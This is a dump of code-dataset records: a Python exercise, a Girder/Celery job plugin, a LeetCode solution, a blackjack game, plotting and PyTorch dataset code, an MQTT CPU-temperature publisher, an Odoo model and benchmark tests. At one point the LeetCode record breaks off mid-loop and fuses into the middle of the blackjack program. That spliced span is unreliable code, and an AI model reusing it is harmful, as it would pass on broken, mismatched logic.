\").strip().upper()\nprint(f\"No total {len(valores)}, foram digitados, sendo eles: \")\nvalores.sort(reverse=True)\nfor c in range (len(valores)):\n print(valores[c],end=\"..,\")\nif 5 in valores:\n print(f\"\\nO número cinco foi encontrado na posição {valores.index(5)+1}\")\nelse:\n print(\"\\nO Valor 5 não foi encontrado\")","repo_name":"Peedrooo/Learning_Python","sub_path":"CursoEmVideo/Exercício81.py","file_name":"Exercício81.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"6844663118","text":"from celery.result import AsyncResult\n\nfrom girder import events, logger\nfrom girder.constants import AccessType\nfrom girder.exceptions import ValidationException\nfrom girder.plugins.jobs.constants import JobStatus\nfrom girder.plugins.jobs.models.job import Job\nfrom girder.utility import setting_utilities\n\nfrom .constants import PluginSettings\nfrom .utils import getWorkerApiUrl, jobInfoSpec, getCeleryApp\nfrom .api.worker import Worker\n\n\nclass CustomJobStatus(object):\n \"\"\"\n The custom job status flags for the worker.\n \"\"\"\n FETCHING_INPUT = 820\n CONVERTING_INPUT = 821\n CONVERTING_OUTPUT = 822\n PUSHING_OUTPUT = 823\n CANCELING = 824\n\n # valid transitions for worker scheduled jobs\n valid_worker_transitions = {\n JobStatus.QUEUED: [JobStatus.INACTIVE],\n JobStatus.RUNNING: [JobStatus.QUEUED, FETCHING_INPUT],\n FETCHING_INPUT: [JobStatus.RUNNING],\n CONVERTING_INPUT: [JobStatus.RUNNING, FETCHING_INPUT],\n CONVERTING_OUTPUT: [JobStatus.RUNNING],\n PUSHING_OUTPUT: [JobStatus.RUNNING, CONVERTING_OUTPUT],\n CANCELING: [JobStatus.INACTIVE, JobStatus.QUEUED, JobStatus.RUNNING],\n JobStatus.ERROR: [FETCHING_INPUT, CONVERTING_INPUT, CONVERTING_OUTPUT,\n PUSHING_OUTPUT, CANCELING, JobStatus.QUEUED,\n JobStatus.RUNNING],\n # The last two are allowed for revoke called from outside Girder\n JobStatus.CANCELED: [CANCELING, JobStatus.QUEUED, JobStatus.RUNNING],\n JobStatus.SUCCESS: [JobStatus.RUNNING, PUSHING_OUTPUT]\n }\n\n # valid transitions for celery scheduled jobs\n # N.B. 
We have the extra worker input/output states defined here for when\n # we are running girder_worker.run as a regular celery task\n valid_celery_transitions = {\n JobStatus.QUEUED: [JobStatus.INACTIVE],\n # Note celery tasks can jump straight from INACTIVE to RUNNING\n JobStatus.RUNNING: [JobStatus.INACTIVE, JobStatus.QUEUED,\n FETCHING_INPUT],\n FETCHING_INPUT: [JobStatus.RUNNING],\n CONVERTING_INPUT: [JobStatus.RUNNING, FETCHING_INPUT],\n CONVERTING_OUTPUT: [JobStatus.RUNNING],\n PUSHING_OUTPUT: [JobStatus.RUNNING, CONVERTING_OUTPUT],\n CANCELING: [JobStatus.INACTIVE, JobStatus.QUEUED, JobStatus.RUNNING],\n JobStatus.ERROR: [FETCHING_INPUT, CONVERTING_INPUT, CONVERTING_OUTPUT,\n PUSHING_OUTPUT, CANCELING, JobStatus.QUEUED,\n JobStatus.RUNNING],\n JobStatus.CANCELED: [CANCELING, JobStatus.INACTIVE, JobStatus.QUEUED,\n JobStatus.RUNNING],\n JobStatus.SUCCESS: [JobStatus.RUNNING, PUSHING_OUTPUT]\n }\n\n @classmethod\n def isValid(cls, status):\n return status in (\n cls.FETCHING_INPUT,\n cls.CONVERTING_INPUT,\n cls.CONVERTING_OUTPUT,\n cls.PUSHING_OUTPUT,\n cls.CANCELING\n )\n\n @classmethod\n def validTransitionsWorker(cls, status):\n return cls.valid_worker_transitions.get(status)\n\n @classmethod\n def validTransitionsCelery(cls, status):\n return cls.valid_celery_transitions.get(status)\n\n\ndef schedule(event):\n \"\"\"\n This is bound to the \"jobs.schedule\" event, and will be triggered any time\n a job is scheduled. This handler will process any job that has the\n handler field set to \"worker_handler\".\n \"\"\"\n job = event.info\n if job['handler'] == 'worker_handler':\n task = job.get('celeryTaskName', 'girder_worker.run')\n\n # Set the job status to queued\n Job().updateJob(job, status=JobStatus.QUEUED)\n\n # Send the task to celery\n asyncResult = getCeleryApp().send_task(\n task, job['args'], job['kwargs'], queue=job.get('celeryQueue'), headers={\n 'jobInfoSpec': jobInfoSpec(job, job.get('token', None)),\n 'apiUrl': getWorkerApiUrl()\n })\n\n # Record the task ID from celery.\n Job().updateJob(job, otherFields={\n 'celeryTaskId': asyncResult.task_id\n })\n\n # Stop event propagation since we have taken care of scheduling.\n event.stopPropagation()\n\n\ndef cancel(event):\n \"\"\"\n This is bound to the \"jobs.cancel\" event, and will be triggered any time\n a job is canceled. This handler will process any job that has the\n handler field set to \"worker_handler\".\n \"\"\"\n job = event.info\n if job['handler'] in ['worker_handler', 'celery_handler']:\n # Stop event propagation and prevent default, we are using a custom state\n event.stopPropagation().preventDefault()\n\n celeryTaskId = job.get('celeryTaskId')\n\n if celeryTaskId is None:\n msg = (\"Unable to cancel Celery task. 
Job '%s' doesn't have a Celery task id.\"\n % job['_id'])\n logger.warn(msg)\n return\n\n if job['status'] not in [CustomJobStatus.CANCELING, JobStatus.CANCELED,\n JobStatus.SUCCESS, JobStatus.ERROR]:\n # Set the job status to canceling\n Job().updateJob(job, status=CustomJobStatus.CANCELING)\n\n # Send the revoke request.\n asyncResult = AsyncResult(celeryTaskId, app=getCeleryApp())\n asyncResult.revoke()\n\n\n@setting_utilities.validator({\n PluginSettings.API_URL\n})\ndef validateApiUrl(doc):\n val = doc['value']\n if val and not val.startswith('http://') and not val.startswith('https://'):\n raise ValidationException('API URL must start with http:// or https://.', 'value')\n\n\n@setting_utilities.validator(PluginSettings.DIRECT_PATH)\ndef _validateAutoCompute(doc):\n if not isinstance(doc['value'], bool):\n raise ValidationException('The direct path setting must be true or false.')\n\n\ndef validateJobStatus(event):\n \"\"\"Allow our custom job status values.\"\"\"\n if CustomJobStatus.isValid(event.info):\n event.preventDefault().addResponse(True)\n\n\ndef validTransitions(event):\n \"\"\"Allow our custom job transitions.\"\"\"\n states = None\n if event.info['job']['handler'] == 'worker_handler':\n states = CustomJobStatus.validTransitionsWorker(event.info['status'])\n elif event.info['job']['handler'] == 'celery_handler':\n states = CustomJobStatus.validTransitionsCelery(event.info['status'])\n if states is not None:\n event.preventDefault().addResponse(states)\n\n\ndef attachParentJob(event):\n \"\"\"Attach parentJob before a model is saved.\"\"\"\n job = event.info\n if job.get('celeryParentTaskId'):\n celeryParentTaskId = job['celeryParentTaskId']\n parentJob = Job().findOne({'celeryTaskId': celeryParentTaskId})\n event.info['parentId'] = parentJob['_id']\n\n\ndef attachJobInfoSpec(event):\n \"\"\"Attach jobInfoSpec after a model is saved.\"\"\"\n job = event.info\n # Local jobs have a module key\n if not job.get('module'):\n Job().updateJob(job, otherFields={'jobInfoSpec': jobInfoSpec(job)})\n\n\ndef load(info):\n info['apiRoot'].worker = Worker()\n\n events.bind('jobs.schedule', 'worker', schedule)\n events.bind('jobs.status.validate', 'worker', validateJobStatus)\n events.bind('jobs.status.validTransitions', 'worker', validTransitions)\n events.bind('jobs.cancel', 'worker', cancel)\n events.bind('model.job.save.after', 'worker', attachJobInfoSpec)\n events.bind('model.job.save', 'worker', attachParentJob)\n Job().exposeFields(AccessType.SITE_ADMIN, {'celeryTaskId', 'celeryQueue'})\n","repo_name":"ShenQianwithC/girder-pv","sub_path":"plugins/worker/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":7499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2038071663","text":"# 38. 
Count and Say\n# https://leetcode.com/problems/count-and-say/\n\n\nclass Solution(object):\n def countAndSay(self, n):\n \"\"\"\n :type n: int\n :rtype: str\n \"\"\"\n i = 1\n res = '1'\n while i 21:\r\n #print(\"User sum over 21\")\r\n if 11 in user: # User is over 21 but has ACE\r\n print(\"You have ACE so it will count as 1\")\r\n user.remove(11)\r\n user.append(1)\r\n #print('user',user)\r\n\r\n else: # User is over 21 and dont have ACE \r\n return \"User Loss\"\r\n\r\nwhile True:\r\n main_choice = input(\"\\nDo you want to play Backjack game, Type 'y' or 'n': \").lower()\r\n if main_choice == 'n':\r\n break\r\n\r\n elif main_choice == 'y':\r\n print(logo)\r\n \r\n if len(user) > 0:\r\n user.clear()\r\n comp.clear()\r\n\r\n print(\"\\nAdded 2 cards for you and computer\")\r\n\r\n for _ in range(2):\r\n get_card(user)\r\n get_card(comp)\r\n\r\n print(f\"Your cards are {user} and score is {sum(user)}\")\r\n print(f'Computers first card is: [{comp[0]}]')\r\n\r\n while True:\r\n # Check for Black Jack\r\n if sum(user) == 21 and 11 in user:\r\n if sum(comp) == 21: # If user and comp both have blackjack then computer must win.\r\n print(\"\\nComputer win with Blackjack...!!!!!\")\r\n break\r\n else:\r\n print(\"\\nYou win with Blackjack...!!!!!\")\r\n break\r\n elif sum(comp) == 21 and 11 in comp:\r\n print(\"\\nComputer win with Blackjack...!!!!!\")\r\n break\r\n \r\n choice = input(\"\\nType 'Y' to add card or 'N' to pass: \").lower()\r\n if choice == 'y':\r\n get_card(user) # Get Random card\r\n\r\n result = score(user, comp)\r\n print(f\"\\nYour cards are {user} and score is {sum(user)}\")\r\n print('Computers first card: ',comp[0])\r\n \r\n if result == 'User Loss':\r\n print(\"\\nYour score is more than 21 so Computer wins...!!!\")\r\n break\r\n \r\n elif choice == 'n':\r\n if sum(comp) < 17: # Computers score is less than 17\r\n print(\"\\nComputers turn\")\r\n get_card(comp) # One more card is added for computer\r\n\r\n if sum(comp) > 21:\r\n print(\"\\nComputer wins...!!!!\")\r\n break\r\n\r\n elif sum(comp) > sum(user):\r\n print(\"\\nComputer wins...!!!!\")\r\n break\r\n\r\n elif sum(comp) < sum(user):\r\n print(\"\\nYou wins...!!!!\")\r\n break\r\n\r\n elif sum(comp) == sum(user):\r\n print(\"\\nDraw...!!!!\")\r\n break\r\n break\r\n \r\n print(f\"\\nYour cards are {user} and Final Score is {sum(user)}\")\r\n print(f\"Computers's cards are {comp} and Final Score is {sum(comp)}\")\r\n","repo_name":"Prakash-Shelar1891/Python-Mini-Projects","sub_path":"Blackjack Game.py","file_name":"Blackjack Game.py","file_ext":"py","file_size_in_byte":3898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32406770178","text":"import numpy as np\nfrom scipy import stats\n\nimport matplotlib\n#matplotlib.use(\"Qt5Agg\") # use PyQt5\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d.art3d import Poly3DCollection,Line3DCollection\nfrom matplotlib.patches import FancyArrowPatch\nfrom mpl_toolkits.mplot3d import proj3d\nfrom matplotlib.ticker import MultipleLocator\nfrom matplotlib import rc\n\nimport os\n\n\ndef makeLabelList2D(bracket1,bracket2,IndexArray):\n '''\n returns the 2D indices formated with chosen bracket\n ''' \n LabelList=list()\n for ix in range(IndexArray.shape[1]):\n #print(IndexArray[:,ix])\n formattedline =(bracket1+'%i,%i'+bracket2) % ( tuple(IndexArray[:,ix]) )\n LabelList.append(formattedline)\n\n return np.array(LabelList)\n\n\nclass PCPlotter(object): \n \n def 
__init__(self,primary,secondary=None,plane_quad=None,\n grid2D=None,plane_PC=None,BI=None):\n #primary plot coordinate list\n self.primary=primary\n # secondary data for comparison\n if secondary is not None:\n self.secondary = secondary\n else:\n self.secondary =None\n # best fit plane vertices \n if plane_quad is not None:\n self.plane_quad = plane_quad\n else:\n self.plane_quad = None\n # best fit in plane: all grid points \n if grid2D is not None:\n self.grid2D = grid2D\n else:\n self.grid2D = None\n # in-plane experimental scan points from PC fit \n if plane_PC is not None:\n self.plane_PC = plane_PC\n else:\n self.plane_PC = None \n # beam indices for PC value list \n if BI is not None:\n self.BI = BI\n else:\n self.BI = None \n self.PLOT_SCAN_LABELS=True \n \n\n \n def plot(self,plotdir='.', show=False, plot3d=False):\n ''' plot projection centers\n '''\n if not os.path.exists(plotdir):\n print('pcplotter, creating dir: ',plotdir)\n os.makedirs(plotdir)\n \n \n primary=self.primary\n if self.secondary is not None:\n secondary=self.secondary\n \n if self.secondary is not None:\n error_vecs= self.secondary - self.primary\n #errors=np.ravel(np.abs(error_vecs[:,1])) # check xyz\n errors=np.linalg.norm( error_vecs, axis=1)\n #print(errors) \n \n #errors=np.mean(np.abs(secondary[:,0] - primary[:,0]))\n #print(\"Mean error of projective primary:\", np.mean(errors))\n print(\"Median error of projective fit:\", np.median(errors))\n fig = plt.figure()\n plt.hist(errors,bins=71)\n plt.title('projective geometry model: estimation of single-pattern error\\n'\n +'median of errors={0: >#05.2f} $\\mu m$'. format(float(np.median(errors))))\n plt.ylabel('number of measurements', color='k', fontsize=22)\n plt.xlabel(r'$|PC_{\\mathrm{exp}}-PC_{\\mathrm{projective}}|$ ($\\mu m$)', color='k',fontsize=22) \n plt.savefig(plotdir+'PCXYZ_ERRORS.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close()\n\n if (self.grid2D is not None):\n # this plot is in the SAMPLE SYSTEM\n # (x axis opposite direction to Detector-X)\n X_AXIS_FACTOR=-1.0\n fig, ax = plt.subplots(1,1)\n plt.rc('xtick', labelsize=14)\n plt.rc('ytick', labelsize=14) \n #plt.title(title,fontsize=26)\n ax.set_ylabel(r'Y$_{SAMPLE}$ ($\\mu m$)', color='k', fontsize=22)\n ax.set_xlabel(r'X$_{SAMPLE}$ ($\\mu m$)', color='k',fontsize=22)\n\n ax.scatter(X_AXIS_FACTOR*self.grid2D.T[0],self.grid2D.T[1],s=8,c='lightblue',alpha=0.9, lw=0)\n # experimental points\n if self.plane_PC is not None:\n #print(self.plane_PC.T[0], self.plane_PC.T[1])\n ax.scatter(X_AXIS_FACTOR*self.plane_PC.T[0], self.plane_PC.T[1], s=5, c='k', alpha=0.9, lw=0)\n # labels\n if self.PLOT_SCAN_LABELS:\n labels = makeLabelList2D('(',')',self.BI.T[0:2])\n # todo: logging\n #print(labels)\n #print(self.plane_PC.T[0], self.plane_PC.T[1])\n for label, x, y in zip(labels, np.ravel(X_AXIS_FACTOR*self.plane_PC.T[0]), np.ravel(self.plane_PC.T[1])):\n ax.annotate(\n label, zorder=105,\n xy = (x, y), xytext = (0, 10), fontsize=6,\n color='black', #weight='bold',\n textcoords = 'offset points', ha = 'center', va = 'bottom',\n bbox = dict(boxstyle = 'round,pad=0.2', fc = 'yellow', alpha = 0.6),\n arrowprops = dict(arrowstyle = '-', connectionstyle = 'arc3,rad=0')) \n \n \n ax.grid(True)\n ax.invert_xaxis()\n ax.yaxis.tick_right()\n ax.yaxis.set_label_position(\"right\")\n ax.set_aspect('equal', 'datalim')\n plt.savefig(plotdir+'SCAN_SAMPLE.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close() \n \n \n fig, ax = plt.subplots(1,1)\n #ax = fig.add_subplot(221)\n 
plt.rc('xtick', labelsize=14)\n plt.rc('ytick', labelsize=14) \n #plt.title(title,fontsize=26)\n ax.set_ylabel(r'$\\Delta$PC$_Y$ ($\\mu m$)', color='k', fontsize=22)\n ax.set_xlabel(r'$\\Delta$PC$_X$ ($\\mu m$)', color='k',fontsize=22)\n ax.scatter(primary.T[0],primary.T[1],s=12,c='r',alpha=0.9, lw=0)\n if self.secondary is not None:\n ax.scatter(secondary.T[0],secondary.T[1],s=5,c='b',alpha=0.9,lw=0)\n ax.grid(True)\n ax.set_aspect('equal', 'datalim')\n plt.savefig(plotdir+'PCXY.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close()\n \n\n\n fig, ax = plt.subplots(1,1)\n #ax = fig.add_subplot(222)\n plt.rc('xtick', labelsize=14)\n plt.rc('ytick', labelsize=14) \n #plt.title(title,fontsize=26)\n ax.set_ylabel(r'$\\Delta$PC$_Z$ ($\\mu m$)', color='k', fontsize=22)\n ax.set_xlabel(r'$\\Delta$PC$_X$ ($\\mu m$)', color='k',fontsize=22)\n \n ax.scatter(primary.T[0],primary.T[2],s=22,c='red',alpha=1.0,lw=0)\n if self.secondary is not None:\n plt.scatter(secondary.T[0],secondary.T[2],s=10,c='blue',alpha=1.0,lw=0)\n ax.grid(True)\n ax.set_aspect('equal', 'datalim')\n ax.invert_yaxis()\n plt.savefig(plotdir+'PCXZ.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close()\n \n fig, ax = plt.subplots(1,1)\n #ax = fig.add_subplot(223)\n plt.rc('xtick', labelsize=14)\n plt.rc('ytick', labelsize=14) \n #plt.title(title,fontsize=26)\n ax.set_ylabel(r'$\\Delta$PC$_Y$ ($\\mu m$)', color='k', fontsize=22)\n ax.set_xlabel(r'$\\Delta$PC$_Z$ ($\\mu m$)', color='k',fontsize=22)\n #plt.gca().invert_yaxis() # consistent with y measured from top of pattern\n ax.scatter(primary.T[2],primary.T[1],s=22,c='r',alpha=1.0,lw=0)\n if self.secondary is not None:\n ax.scatter(secondary.T[2],secondary.T[1],s=10,c='b',alpha=1.0,lw=0)\n #plt.plot(primary.T[2],fittedY,'y-' )\n ax.grid(True)\n ax.set_aspect('equal', 'datalim')\n ax.invert_xaxis()\n plt.savefig(plotdir+'PCYZ.png',dpi=300,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close()\n \n \n # ---------- 3D PLOT ----------------\n if plot3d:\n rc('font',size=16)\n #rc('font',family='serif')\n rc('axes',labelsize=16)\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n \n # best fit PLANE\n if self.plane_quad is not None:\n quad_verts=[self.plane_quad] # vertices stored by __init__\n ax.add_collection3d( Poly3DCollection(quad_verts, facecolors='b', linewidths=1, alpha=0.4) )\n \n ax.scatter(primary.T[0],primary.T[2],primary.T[1], c='r', s=8, marker='o',lw=0.1, edgecolors='k',alpha=1.0)\n plt.grid(True)\n \n #if self.secondary is not None:\n #ax.scatter(secondary.T[0],secondary.T[2],secondary.T[1],s=16, c='b', marker='o',lw=0,alpha=0.3)\n\n ax.set_xlabel('\\n'+r'$\\Delta$PC$_X$ ($\\mu m$)')\n ax.set_ylabel('\\n\\n'+r'$\\Delta$PC$_Z$ ($\\mu m$)')\n ax.set_zlabel('\\n\\n'+r'$\\Delta$PC$_Y$ ($\\mu m$)')\n #plt.title(r'sample plane tilt relative to detector plane'+'\\n'\n # +r'$\\tau_X$={0: >#05.2f}'. format(float(np.degrees(self.xtilt_rad)))\n # +r'° $\\nu_Z$= {0: >#05.2f}'. 
format(float(np.degrees(self.ztilt_rad)))+'° \\n' )\n min3d=np.min(primary)\n max3d=np.max(primary)\n ax.set_xlim3d(min3d, max3d)\n ax.set_ylim3d(min3d, max3d)\n ax.set_zlim3d(min3d, max3d)\n \n [t.set_va('center') for t in ax.get_yticklabels()]\n [t.set_ha('left') for t in ax.get_yticklabels()]\n [t.set_va('center') for t in ax.get_xticklabels()]\n [t.set_ha('right') for t in ax.get_xticklabels()]\n [t.set_va('center') for t in ax.get_zticklabels()]\n [t.set_ha('left') for t in ax.get_zticklabels()]\n \n ax.xaxis._axinfo['tick']['inward_factor'] = 0\n ax.xaxis._axinfo['tick']['outward_factor'] = 0.4\n ax.yaxis._axinfo['tick']['inward_factor'] = 0\n ax.yaxis._axinfo['tick']['outward_factor'] = 0.4\n ax.zaxis._axinfo['tick']['inward_factor'] = 0\n ax.zaxis._axinfo['tick']['outward_factor'] = 0.4\n ax.zaxis._axinfo['tick']['outward_factor'] = 0.4\n \n ax.xaxis.set_major_locator(MultipleLocator(3000))\n ax.yaxis.set_major_locator(MultipleLocator(3000))\n ax.zaxis.set_major_locator(MultipleLocator(3000))\n \n plt.gca().invert_yaxis() # view from detector along negative Z\n plt.savefig(plotdir+'PCXYZ_FIT.png',dpi=300) # ,bbox_inches = 'tight')\n if show:\n plt.show()\n plt.close() ","repo_name":"wiai/xcdskd","sub_path":"src/aloe/plotting/pcplotter.py","file_name":"pcplotter.py","file_ext":"py","file_size_in_byte":10491,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"12445167875","text":"# references:\n# https://github.com/weigq/3d_pose_baseline_pytorch/blob/master/src/datasets/human36m.py\n# https://github.com/una-dinosauria/3d-pose-baseline/blob/master/src/linear_model.py#L247\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import Dataset\n\n\nclass Human36M(Dataset):\n def __init__(self, pose_set_2d, pose_set_3d, camera_frame=True):\n \"\"\"\n\n Args:\n pose_set_2d (dict[tuple, numpy.array]): 2d pose set.\n pose_set_3d (dict[tuple, numpy.array]): 3d pose set.\n camera_frame (bool, optional): Make this True if pose_set_3d is in camera coordinates. 
Defaults to True.\n \"\"\"\n self.poses_2d = []\n self.poses_3d = []\n self.actions = []\n\n for key2d in pose_set_2d.keys():\n subj, act, seqname = key2d\n # Keys should be the same if 3d poses are in camera frame.\n key3d = (\n key2d\n if camera_frame\n else (subj, act, \"{}.h5\".format(seqname.split(\".\")[0]))\n )\n\n poses_2d = pose_set_2d[key2d] # [n, 16 x 2]\n poses_3d = pose_set_3d[key3d] # [n, n_joints x 3]\n assert len(poses_2d) == len(poses_3d)\n actions = [act] * len(poses_2d) # [n,]\n\n self.poses_2d.append(poses_2d)\n self.poses_3d.append(poses_3d)\n self.actions.extend(actions)\n\n self.poses_2d = np.vstack(self.poses_2d) # [N, 16 x 2]\n self.poses_3d = np.vstack(self.poses_3d) # [N, n_joints x 3]\n self.actions = np.array(self.actions) # [N,]\n\n assert len(self.poses_2d) == len(self.poses_3d) == len(self.actions)\n\n def __getitem__(self, idx):\n \"\"\"Get a set of 2d pose, 3d pose, and action.\n\n Args:\n idx (int): Index of the 2d/3d pose pair to get.\n\n Returns:\n (dict): a set of 2d pose, 3d pose, and action.\n pose_2d (torch.Tensor): 2d pose (model input).\n pose_3d (torch.Tensor): 3d pose (model output i.e., label).\n action (str): Action to which the pose pair belongs.\n \"\"\"\n pose_2d = torch.from_numpy(self.poses_2d[idx]).float()\n pose_3d = torch.from_numpy(self.poses_3d[idx]).float()\n action = self.actions[idx]\n\n return {\"pose_2d\": pose_2d, \"pose_3d\": pose_3d, \"action\": action}\n\n def __len__(self):\n \"\"\"Return the number of the samples.\n\n Returns:\n (int): Number of the samples.\n \"\"\"\n return len(self.poses_2d)\n","repo_name":"motokimura/3d-pose-baseline-pytorch","sub_path":"human_3d_pose_baseline/datasets/human36m.py","file_name":"human36m.py","file_ext":"py","file_size_in_byte":2515,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"47"} +{"seq_id":"72918716942","text":"import paho.mqtt.client as paho\nimport psutil as ps\nimport time\nimport json\n\nbroker=\"127.0.0.1\"\nport=1883\ndata = {'cpu0':{},'cpu1':{}}\n\ndef on_publish(client,userdata,result): #create function for callback\n print(\"data published \\n\")\n pass\ndef on_disconnect(client, userdata, rc):\n print(\"client disconnected ok\")\n \nprint(json.dumps(data))\nclient1= paho.Client(\"control1\") #create client object\nclient1.on_disconnect = on_disconnect\nclient1.on_publish = on_publish #assign function to callback\nclient1.connect(broker,port) #establish connection\nclient1.subscribe(\"Cpu\")\nwhile True:\n\tresult = ps.sensors_temperatures()\n\tmillis = int(round(time.time() * 1000))\n\tdata['cpu0']['Temperature'] = result['coretemp'][1][1]\n\tdata['cpu1']['Temperature'] = result['coretemp'][2][1]\n\tdata['cpu0']['Time'] = millis\n\tdata['cpu1']['Time'] = millis\n\tret= client1.publish(\"Cpu\",json.dumps(data)) \n\ttime.sleep(3)\nclient1.disconnect()\n\n","repo_name":"FelipeSchreiber/IoT","sub_path":"TrabalhoNodeRed/mqtt.py","file_name":"mqtt.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72454369104","text":"from odoo import models\n\n\nclass ProductAttributeValue(models.Model):\n _name = 'product.attribute.value'\n _inherit = ['product.attribute.value', 'integration.model.mixin']\n\n def to_export_format(self, integration):\n self.ensure_one()\n\n return {\n 'external_id': self.try_to_external(integration),\n 'attribute': self.attribute_id.to_external_or_export(integration),\n 'name': 
integration.convert_translated_field_to_integration_format(\n self, 'name',\n ),\n }\n\n def export_with_integration(self, integration):\n self.ensure_one()\n return integration.export_attribute_value(self)\n","repo_name":"JUMO-Technologies/prestashop","sub_path":"integration/models/product_attribute_value.py","file_name":"product_attribute_value.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39175835067","text":"#!/usr/bin/env python3\n\n\"\"\"Verify bench_stuff.py functions and functionality across valid and invalid inputs.\"\"\"\n\nimport unittest\nfrom pathlib import PosixPath\nfrom shutil import copytree\nfrom tempfile import TemporaryDirectory\nfrom unittest.mock import Mock, call, patch\n\nimport bench_stuff\n\n\nclass FakeEnv(Mock):\n\n envs = None\n\n def int(self, key):\n return int(self.envs[key])\n\n def str(self, key):\n return str(self.envs[key])\n\n\ndef fakedie(msg, code=1):\n raise RuntimeError(msg)\n\n\nclass TestBase(unittest.TestCase):\n\n TEMPDIR = None\n FAKE_FIRESTORE = None\n FAKE_DIE = None\n FAKE_ENV = None\n FAKE_BENCH_VER = 1\n FAKE_CPUS = 96\n FAKE_MEM = 1024 * 1024\n FAKE_TASK = 12345\n FAKE_BUILD = 54321\n FAKE_BRANCH = \"test/testing\"\n FAKE_DISTRO = \"TestOS-42\"\n FAKE_UNAME_R = \"1.2.3-4.i386\"\n FAKE_UNAME_M = \"i386\"\n FAKE_INST = \"box\"\n FAKE_COMMIT = \"1e06c1a47a71cc649032bf6ee71e14b990dae957\"\n\n def setUp(self):\n bench_stuff.VERBOSE = False\n self.FAKE_FIRESTORE = Mock(spec=bench_stuff.firestore)\n # The env class/objects operate with a global-scope, which makes testing hard.\n # Avoid trying to keep globals \"sane\" by mocking out envparse.env() entirely.\n self.FAKE_ENV = FakeEnv()\n self.FAKE_ENV.envs = {\n \"BENCH_ENV_VER\": self.FAKE_BENCH_VER,\n \"CPUTOTAL\": self.FAKE_CPUS,\n \"MEMTOTALKB\": self.FAKE_MEM,\n \"CIRRUS_TASK_ID\": self.FAKE_TASK,\n \"CIRRUS_BUILD_ID\": self.FAKE_BUILD,\n \"CIRRUS_BRANCH\": self.FAKE_BRANCH,\n \"DISTRO_NV\": self.FAKE_DISTRO,\n \"UNAME_R\": self.FAKE_UNAME_R,\n \"UNAME_M\": self.FAKE_UNAME_M,\n \"INST_TYPE\": self.FAKE_INST,\n \"CIRRUS_CHANGE_IN_REPO\": self.FAKE_COMMIT,\n }\n self.FAKE_DIE = Mock(side_effect=fakedie)\n patch('bench_stuff.firestore', new=self.FAKE_FIRESTORE).start()\n patch('bench_stuff.env', new=self.FAKE_ENV).start()\n patch('bench_stuff.die', new=self.FAKE_DIE).start()\n self.addCleanup(patch.stopall)\n self.TEMPDIR = TemporaryDirectory(prefix=\"tmp_test_bench_stuff_\")\n\n def tearDown(self):\n self.TEMPDIR.cleanup()\n\n\nclass TestMain(TestBase):\n\n def setUp(self):\n super().setUp()\n\n def test_good(self):\n tmp = PosixPath(self.TEMPDIR.name)\n copytree(\"./test_data/good\", tmp, dirs_exist_ok=True)\n\n bench_stuff.main(tmp / \"benchmarks.env\", tmp / \"benchmarks.csv\")\n self.FAKE_ENV.read_envfile.assert_called_with(tmp / \"benchmarks.env\")\n\n self.assertTrue(self.FAKE_FIRESTORE.Client.called)\n test_client = self.FAKE_FIRESTORE.Client\n\n bench_call = call().collection('benchmarks')\n type_call = call().collection().document(self.FAKE_UNAME_M)\n key_call = call().collection().document().collection().document(str(self.FAKE_TASK))\n calls = [bench_call, type_call, key_call]\n test_client.assert_has_calls(calls, any_order=True)\n\n @patch('bench_stuff.DRYRUN', new=True)\n def test_dry_run(self):\n tmp = PosixPath(self.TEMPDIR.name)\n copytree(\"./test_data/good\", tmp, dirs_exist_ok=True)\n bench_stuff.main(tmp / \"benchmarks.env\", tmp / \"benchmarks.csv\")\n 
self.FAKE_FIRESTORE.Client.assert_not_called()\n\n def test_unknown_units(self):\n tmp = PosixPath(self.TEMPDIR.name)\n # Contains data with an invalid unit-suffix\n copytree(\"./test_data/bad\", tmp, dirs_exist_ok=True)\n self.FAKE_DIE.assert_not_called()\n self.assertRaisesRegex(RuntimeError,\n r\"parse units from\",\n bench_stuff.main,\n tmp / \"benchmarks.env\",\n tmp / \"benchmarks.csv\")\n self.FAKE_DIE.assert_called_once()\n\n\nclass TestUtils(TestBase):\n\n def test_seconds(self):\n data = {\"lower\": \"1.0001s\", \"upper\": \"1.0001S\", \"space\": \"1.0001 s\"}\n result = bench_stuff.handle_units(data)\n for key in (\"lower\", \"upper\", \"space\"):\n self.assertAlmostEqual(result[key], 1.0001)\n\n def test_kb(self):\n data = {\"lower\": \"1023.99kb\", \"upper\": \"1023.99KB\", \"space\": \"1023.99 kb\"}\n result = bench_stuff.handle_units(data)\n for key in (\"lower\", \"upper\", \"space\"):\n self.assertEqual(result[key], 1048566)\n\n def test_no_units(self):\n self.FAKE_DIE.assert_not_called()\n self.assertRaisesRegex(RuntimeError,\n r\"parse units from.+answer.+42\",\n bench_stuff.handle_units,\n {\"answer\": \"42\"})\n self.FAKE_DIE.assert_called_once()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"CVEDB/automation","sub_path":"bench_stuff/test/test_bench_stuff.py","file_name":"test_bench_stuff.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39044509114","text":"from typing import Any, Callable, Dict, Optional, Union, cast\n\nfrom determined import 